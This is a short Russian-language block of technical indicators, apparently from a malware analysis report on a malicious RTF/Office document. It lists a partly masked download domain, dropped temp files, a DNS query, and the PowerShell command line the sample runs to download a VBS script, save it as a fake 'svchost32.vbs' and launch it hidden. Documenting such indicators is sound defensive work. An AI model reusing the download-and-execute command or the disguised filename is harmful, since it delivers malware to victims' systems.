Техническая информация
- http://on###ivenet.xyz/work/40.vbs как c:\users\public\svchost32.vbs
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{16f1c407-c065-4d56-b7f0-02d51c7ce4bf}.tmp
- <Текущая директория>\~wrd0000.tmp
- <PATH_SAMPLE>.rtf
- DNS ASK on###ivenet.xyz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (New-Object System.Net.WebClient).DownloadFile('http://on###ivenet.xyz/work/40.vbs','C:\Users\Public\svchost32.vbs');Start-Process 'C:\Users\Public\svchost32.vbs'' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\svchost32.vbs"
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding